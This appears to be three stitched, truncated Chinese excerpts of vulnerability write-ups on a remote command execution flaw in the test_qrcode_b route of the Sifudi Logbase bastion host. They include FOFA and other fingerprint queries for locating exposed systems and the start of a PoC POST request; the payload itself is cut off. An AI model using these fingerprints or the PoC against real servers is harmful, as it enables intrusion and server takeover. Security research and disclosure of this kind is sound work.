产品简介思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机漏洞描述由于思福迪运维安全管理系统test_qrcode_b路由存在命令执行漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器资产测绘banner=“Set-Cookie:bhost=”||header=“Set-Cookie:bhost=”漏洞复现POC如下：POST/bhost/test_qrcode_bHTTP/1.1Host:your-ipUser-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_14_3)AppleWebKit/605.

0x01产品简介思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。0x02漏洞概述由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。0x03复现环境FOFA：((title="Logbase"||header="Server:dummy"||body="onclick=\"location.href='trustcert.cgi'")&&body!="couchdb")||banner="Server:dummy"0x04漏洞复现PoCPOST/bhost/test

思福迪运维安全管理系统test_qrcode_b远程命令执行漏洞一、漏洞描述二、漏洞影响三、网络测绘四、漏洞复现1.手动复现2.自动化复现3.python源代码免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。一、漏洞描述思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统test_qrcode_b路由存在命令执行漏洞。二、漏洞影响思福迪运维安全管理系统三、网络测绘app=“思福迪-LOGBASE”四、漏洞复现登